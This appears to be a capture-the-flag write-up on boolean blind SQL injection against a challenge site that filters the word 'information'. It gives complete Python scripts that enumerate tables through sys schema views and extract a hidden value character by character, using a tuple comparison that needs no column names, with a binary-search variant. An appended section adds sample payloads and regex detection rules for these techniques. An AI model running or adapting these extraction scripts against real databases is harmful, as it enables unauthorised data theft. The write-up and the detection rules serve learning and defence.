Blind injection + column-name-less injection (with "information" filtered)

    Detection:
    id=2||1=2 returns V&N
    id=2||1=1 returns Nu1L
    When the condition after || is true the page returns Nu1L; when it is false it returns V&N. This is the key to telling whether a blind-injection condition holds.
    id=2||length(database())>1 can then be used to test conditions about the database (here, the length of its name).

    Use a script to enumerate the names (the word "information" is filtered, so information_schema is replaced by a view from the sys schema)

    import requests

    url = "http://769df5bc-a6d9-4ce7-b684-da6fa5aafdfa.node3.buuoj.cn/index.php"
    # sys.schema_table_statistics_with_buffer stands in for the filtered information_schema.tables
    payload = '2||ascii(substr((select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database()),{},1))={}'
    flag = ''
    for j in range(1, 500):
        for i in range(32, 127):
            py = payload.format(j, i)
            post_data = {'id': py}
            resp = requests.post(url, data=post_data)
            if 'Nu1L' in resp.text:
                flag += chr(i)
                print(flag)
                break

    Next comes the column-name-less injection
    https://blog.csdn.net/weixin_43940853/article/details/106164162

    This relies on an ASCII offset, i.e. MySQL string comparison only compares the first character of the strings.
    We can use this property to build a loop over ASCII 32 to 128, compare each candidate against the flag, and the condition returns True once it is satisfied.

    Note here:
    the script uses flag += chr(char-1) because the comparison first becomes true one character above the real one (a candidate equal to the real prefix is shorter than the stored value, so it still compares as smaller).
    The character we want to match is f, so the first matching value has to be decremented: chr(i)-1.

    Final script

    import requests

    url = "http://769df5bc-a6d9-4ce7-b684-da6fa5aafdfa.node3.buuoj.cn/index.php"
    flag = ''

    for i in range(1, 100):
        for char in range(32, 127):
            # Candidate prefix: the characters recovered so far plus the next guess
            candidate = flag + chr(char)
            payload = '2||((select 1,"{}") > (select * from f1ag_1s_h3r3_hhhhh))'.format(candidate)
            # Testing showed f1ag_1s_h3r3_hhhhh has 2 columns, hence the 1,"{}" tuple

            data = {'id': payload}
            r = requests.post(url=url, data=data)
            if 'Nu1L' in r.text:
                # The comparison first turns true one character above the real one
                flag += chr(char - 1)
                print(flag)
                break
    

    Single-threaded this runs too slowly; later I found a binary-search version

    # coding:utf-8
    import requests
    import time

    url = 'http://769df5bc-a6d9-4ce7-b684-da6fa5aafdfa.node3.buuoj.cn/index.php'

    def str_hex(s):  # hex-encode a string so no quotes are needed: fl ==> 0x666c
        res = ''
        for i in s:
            res += hex(ord(i)).replace('0x', '')
        res = '0x' + res
        return res

    res = ''
    for i in range(1, 200):
        print(i)
        left = 31
        right = 127
        mid = left + ((right - left) >> 1)
        while left < right:
            #payload = '1^(ascii(substr(database(),{},1))>{})'.format(i,mid)  # dump database name
            #payload = '1^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})'.format(i,mid)  # dump table names
            #payload = '1^(ascii(substr((select group_concat(flag) from f1ag_1s_h3r3_hhhhh),{},1))>{})'.format(i,mid)  # guessed that the column in f1ag_1s_h3r3_hhhhh is named flag
            key = str_hex(res + chr(mid))
            payload = "1 ^ ( (select 1,{}) > (select * from f1ag_1s_h3r3_hhhhh))".format(key)
            data = {'id': payload}
            r = requests.post(url=url, data=data)
            if r.status_code == 429:
                print('too fast')
                time.sleep(2)
                continue  # retry the same mid instead of treating the rate-limit page as a result
            if 'Nu1L' in r.text:
                left = mid + 1
            else:
                right = mid
            mid = left + ((right - left) >> 1)
        if mid == 31 or mid == 127:
            break
        #res += chr(mid)  # dump table names
        res += chr(mid - 1)  # dump flag
        print(str(mid), res)
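As an added example from the detection side (not part of the original writeup; the sample values and rule names are constructed here), the script below contrasts the challenge's keyword filter on "information" with rules that would catch the sys-schema bypass, the per-character inference and the tuple comparison used above:

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values for the "id" parameter, modelled on the payload
# shapes in this writeup (they were not captured from any real site).
SAMPLES = {
    "benign": "2",
    "info_schema": "2||(select count(*) from information_schema.tables)>0",
    "sys_bypass": "2||ascii(substr((select group_concat(table_name) from "
                  "sys.schema_table_statistics_with_buffer where table_schema=database()),1,1))=102",
    "no_column": "1 ^ ( (select 1,0x666c) > (select * from f1ag_1s_h3r3_hhhhh))",
    "length_probe": "2%7C%7Clength(database())%3E1",
}

def naive_blocks(value):
    """The challenge's own filter: reject anything containing 'information'."""
    return "information" in unquote_plus(value).lower()

# What a detection rule should look for instead: the sys schema (the bypass for
# the filtered information_schema), per-character inference, and the tuple
# comparison that reads a table without knowing its column names.
BROAD_RULES = [
    ("information_schema", re.compile(r"information_schema", re.I)),
    ("sys_schema_view", re.compile(r"\bsys\s*\.\s*(x\$)?\w+", re.I)),
    ("char_inference", re.compile(r"ascii\s*\(\s*substr", re.I)),
    ("length_probe", re.compile(r"length\s*\(\s*database\s*\(", re.I)),
    ("tuple_compare", re.compile(
        r"\(\s*select\s+1\s*,.*?\)\s*[<>]\s*\(\s*select\s+\*\s+from", re.I | re.S)),
    ("boolean_glue", re.compile(r"(\|\||\^)\s*\(?\s*(select|ascii|length)", re.I)),
]

def broad_hits(value):
    """Return the names of every BROAD_RULES entry matching a decoded value."""
    decoded = unquote_plus(value)
    return [name for name, rx in BROAD_RULES if rx.search(decoded)]

def audit(samples):
    """Map each sample to (blocked by the naive filter?, broad-rule hits)."""
    return {k: (naive_blocks(v), broad_hits(v)) for k, v in samples.items()}

if __name__ == "__main__":
    for name, (blocked, hits) in audit(SAMPLES).items():
        print(f"{name:13s} naive_blocked={blocked!s:5s} hits={hits}")
```

The naive filter stops only the information_schema probe; every other sample passes it while still hitting at least one of the broader rules.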